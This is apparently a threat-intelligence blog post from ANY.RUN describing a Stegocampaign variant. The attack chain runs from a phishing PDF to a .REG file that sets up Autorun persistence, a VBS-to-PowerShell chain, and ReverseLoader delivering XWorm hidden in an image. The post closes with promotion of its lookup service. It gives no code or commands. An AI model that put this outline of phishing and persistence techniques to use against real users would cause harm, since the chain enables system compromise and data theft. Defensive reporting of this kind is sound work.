Stegoсampaign, a complex attack that leverages phishing, a multi-functional RAT, а loader, and malicious scripts, got a new twist. ANY.RUN’s malware analysts discovered a Stegocampaign variant that uses a Windows registry file to add a malicious script to Autorun.
While exploiting Autorun is rarely used recently, a fresh sample featuring this method has been found.
The Attack Chain
- A user receives a phishing email with a PDF file attached.
- In order to open the attachment, the user is directerd to download “an extension” which is a .REG file.
- On its downloading and opening, this file modifies the registry with a script that fetches a VBS file from the web and adds it to Autorun.
- After Windows reboots or the user logs in, the scheduled task is run. The VBS file launches PowerShell, triggering an execution chain that ultimately infects the operating system with ReverseLoader.
- The loader downloads XWorm, initiating its execution. The payload contains a DLL file embedded in an image, which then extracts XWorm from its resources and injects it into the AddInProcess32 system process.
Track Stegocampaign Evolution to Defend Proactively
This chain of actions abuses legitimate system tools and relies on user actions, making it difficult for automated security solutions to detect. It puts organizations at risk, potentially leading to data breaches and hackers accessing sensitive data.
To protect your network from this Stegocampaign tactic, use ANY.RUN’s Threat Intelligence Lookup to investigate known samples and find similar ones to enrich your understanding of the attack’s TTPs.
Gather more indicators for fine-tuning your detection and response systems and subscribe for automated search results updates to be notified about the newest IOCs and most recent Stegocampaign attacks spotted by the malware analyst community.
Given the domain template used by attackers, submitting “filemail.com” to TI Lookup shows recent malicious domain variants:
The results list a number of associated IPs, abused domains, suspicious files and mutexes.
Launch your first investigation with TI Lookup Get 50 free search requests to research most recent cyber attacks
Last but not least, they contain a selection of public analysis sessions of more Stegocampaign samples with varying payloads and parameters.
Stegocampaign attacks are extremely dangerous. They employ a number of phishing scenarios and persistence techniques, evolve constantly, and call for proactive protection, agile detection and response.
Use threat intelligence solutions to keep up with cyber criminals and stay ahead of their attempts to abuse your resources.
ANY.RUN’s Threat Intelligence Lookup plays a pivotal role in managing such threats. By investigating known samples and identifying similar attack patterns, organizations can gain deeper insights into the tactics, techniques, and procedures (TTPs) employed by adversaries.
This intelligence not only enhances the understanding of emerging threats but also empowers businesses to fine-tune their detection and response systems, ensuring a more robust defense posture.
Arm your SOC team against new threats with the best intelligence Test TI Lookup with 50 free queries